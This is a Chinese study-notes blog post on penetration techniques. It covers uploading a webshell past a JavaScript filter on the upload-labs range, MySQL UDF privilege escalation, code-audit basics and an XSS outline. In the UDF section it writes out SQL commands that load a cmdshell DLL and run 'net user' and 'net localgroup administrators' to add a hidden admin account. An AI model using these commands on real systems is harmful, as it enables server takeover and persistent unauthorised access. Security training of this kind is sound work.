T3SEC 信安 总结!!!

T3SEC信安总结!!!

更多内容:
方圆–方寸之间

主题:揭秘黑客如何通过木马控制目标服务器-webshell

学习前需要了解的内容:

  • 1.了解web的基础的原理(http协议…)
  • 2.对安全工具有一定的了解(burpsuite.中国菜刀等)

靶机:upload-labs

webshell是什么:其实就是一个网页木马

分析:

  • 1.分析上传点: 这是一个js过滤,前端过滤,所有前端过滤都是不安全的.checkFile()这个函数进行了对文件后缀格式的一个限制pass01

  • 2. 方法:

    • 通过burpsuite绕过js前端验证过滤上传webshell

    • 拦截代理:浏览器需要设置代理 ,-----Burpsuite设置

    • 通过浏览器审计工具绕过JS 验证,上传webshell(前端知识有一定的了解)

    • 思路:关闭事件,删除调用函数,修改函数体里面的过滤策略等.

    • 中国菜刀连接上传的webshell控制目标服务器

    • 中国菜刀连接上传额webs hell控制目标服务器进行上传文件.下载文件,等其他权限的获取

主题:揭秘黑客如何拿下目标最高权限

课程前言:

1.论提权的重要性

  • 我们在渗透过程一般都会获得普通用户的权限,在获取系统某些关键信息的时候会受到权限的限制,因此作为安全渗透测试工程师,掌握提权是一项必备的重要技能.

2.提权的分类

  • 数据库提权

  • web提权

  • 操作系统相关提权

3.本期课程内容:

  • 主要讲UDF提权

4.学习本课程需要掌握哪些基础知识:

  • 数据库相关基础

  • 操作系统基础

  • 掌握一些web安全基础

5.环境:phpstudy

  • mysql

  • apache

  • php解析器

6.数据库提权前提条件:已经获得数据库的用户名和密码*

  • 数据库的用户密码渗透:

    • 通过上传webshell到服务器–>利用菜刀工具下载网站的连接数据库的文件 如何判断网站的哪一个文件是连接数据库的文件db_config.php

    • 数据库用户名密码:用户名:root 密码:root

7. 数据库提权:利用数据库的UDF提权(User Defined Function:用户自定义函数.)

  • UDF提权属于版本提权,版本不同方法有一些小区别

  • 区别在于生成udf文件保存的目录不一样

    • mysql<5.1 -->生成UDF路径可放在C:windows/system32/

    • mysql>=5.1 --> 生成udf(.dll)路径放在 mysql安装目录下的\lib\plugin目录下–>如何通过数据库来找

  • mysql>select $$plugin_dir;

  • 脚本自动生成

开始提权:提权脚本

  • 利用提权脚本---->去生成udf文件

  • host:输入服务端主机名或服务器ip地址

  • name: 输入用户名

  • pass: 密码

  • dbname:数据库名字mysql安装好后默认

  • 利用提权脚本—>生成udf文件按(.dll)

select sys_eval(‘net user moon$ 123456 /add & net localgroup administrators moon$ /add’) 创建moon$ 密码为123456 同时提升管理员权限

  • 直接登录数据库进行提权

    • create function cmdshell returns string soname ‘moonudf.dll’;

    • select cmdshell(‘net user waitalone waitalone.cn /add’);

    • select cmdshell(‘net localgroup administrators waitalone /add’);

  • 利用dos开启远程桌面服务

信息安全提权分类

  • 数据库提权:udf提权 mof提权 反弹端口连接提权

  • web安全提权: SQL注入提权,webshell提权,web中间件漏洞提权等

  • 操作系统提权:系统内核溢出提权,错误的系统配置提权,组策略首选项提权,DLL劫持提权,第三方软件 /服务的提权

  • 安卓提权等

主题:寻找网站漏洞:漏洞挖掘

渗透测试VS代码审计:

  • 渗透测试(黑盒测试): 渗透测试的目标是一个黑盒子,我们并不关心软件产品内部的代码结构.我们只知道整个web站点发起一些参数提交,达到我们利用某个漏洞的额攻击效果.

    • 特点:它能够相对于发现操作系统和网络服务宗全形的安全,而不仅仅是对web站点的漏洞挖掘

    • 注意:渗透测试不是真正意义的漏洞挖掘,他仅仅是通过探测或者验证的方式确定漏洞的可利用性.

  • 代码审计**(白盒测试)**:是指有一定安全经验的相关人员,通过阅读开发文档或者网站的源代码,以自动化分析工具或者人工分析对应用程序进行深入分析.高效全面地发现系统代码的缺陷.或者开发人员不安全的编程习惯.并知道开发人员进行修复,保障应用系统的安全运行.

    • 特点:更多是一个静态的代码审计,代码审计更加彻底发现代码风险.
  • 渗透测试VS代码审计的关系

    • 相互补充,相互强化.

    • 代码审计发现问题,渗透测试确定可利用性.

    • 渗透测试发现问题,代码审计确定成因.

漏洞挖掘过程与方式:

  • 漏洞挖掘的过程:

    • 代码审计准备(安全知识+代码审计工具)

    • 采用的方式:自动化工具+人工

    • 找到有漏洞的代码

    • 最终给出修复方案,指导开发人员完善我们的应用系统.

  • 工具漏洞的挖掘方式

    • 优点:效率高

    • 缺点:对漏洞存在误报

  • 人工漏洞挖掘方式

    • 优点:挖掘漏洞的精准

    • 缺点:效率低下

  • 人工+工具漏洞挖掘方式:结合工具和人工漏洞挖掘有点,相互补充,相互强化.

学习本课程需要掌握的知识体系:

  • web安全体系知识(http协议原理,web安全top10漏洞,安全工具)

  • 具备一定的语法基础(Html,CSS JS,ASP,PHP,JSP),以及代码的调试

  • 掌握常用的数据库(Mysql,Oracle,Sqlserver等等)

  • 对开发语言的框架知识有一定的了解,MVC(Model View Controller),SSM(Spring Struts Mybatis),SSH(Spring Struts Hibernate)等等

seay主要审计php语言 fortify:java语言

主题:获取管理员账号密码-窃取cookie

回顾:

  • 渗透测试vs代码审计:

    • 渗透测试VS代码审计

    • 代码审计及特点

    • 渗透测试vs代码审计关系

  • 漏洞挖掘方式

    • 漏洞挖掘过程

    • 漏洞挖掘方式

  • seay代码审计使用

论XSS漏洞的重要性

  • 关联web安全之XSS体系化课程里面的内容.

XSS体系知识:

  • XSS漏洞原理与检测机制
  • XSS反射型.存储型.DOM型
  • XSS漏洞针对客户端(获取cookie,转发邮件,放马,刷流量)
  • XSS漏洞针对服务端(劫持后台,篡改页面,蠕虫,内网扫描)
  • XSS漏洞绕过编码技术
  • XSS漏洞fuzzing Xsser模糊测试
  • XSS漏洞开发与漏洞修复
  • arc-xss漏洞需求分析
  • aec-xss漏洞挖掘过程
  • arc-xss漏洞挖掘利用
  • aec-xss漏洞挖掘验证

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值